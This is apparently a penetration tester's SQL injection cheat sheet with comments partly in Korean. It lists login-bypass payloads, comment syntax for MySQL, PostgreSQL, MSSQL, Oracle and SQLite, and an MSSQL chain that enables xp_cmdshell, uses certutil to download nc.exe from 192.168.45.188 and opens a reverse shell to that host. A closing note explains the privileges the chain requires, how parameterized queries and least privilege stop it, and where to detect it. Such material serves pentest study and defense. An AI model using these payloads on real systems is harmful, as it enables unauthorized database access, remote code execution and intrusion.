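```bash
# 일단 제일 먼저 single quote로 확인 해보기
'
admin'--
admin'-- -
admin' or 1=1 --
admin' or '1'='1
admin' or '1'='1' --
admin' or '1'='1'#
admin' or 1=1#
admin' or 1=1/*
```

```sql
MySQL
#comment
-- comment [Note the space after the double dash]
/*comment*/
/*! MYSQL Special SQL */

PostgreSQL
--comment
/*comment*/

MSSQL
--comment
/*comment*/

Oracle
--comment

SQLite
--comment
/*comment*/

HQL
HQL does not support comments
```

[Pentest Monkey SQLi Cheat Sheet](https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)

#### MSSQL SQL Injection -> Reverse Shell

```sql
1';EXEC xp_cmdshell '<POWERSHELL PAYLOAD>';--

';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; --
';EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--

';EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell 'certutil -urlcache -f http://192.168.45.188/nc.exe C:\windows\temp\nc.exe'; EXEC xp_cmdshell 'C:\windows\temp\nc.exe 192.168.45.188 443 -e cmd.exe';--
```

Note: `xp_cmdshell` is disabled by default on SQL Server, and enabling it through `sp_configure` only works when the injected query runs under a login with server-level configuration rights (for example `sysadmin`), so this chain depends on an over-privileged application login as well as on the injectable query. Parameterized queries and a least-privileged database login break it; each `sp_configure` option change is written to the SQL Server error log, and `sqlservr.exe` spawning `cmd.exe` or `certutil.exe` is a useful detection point.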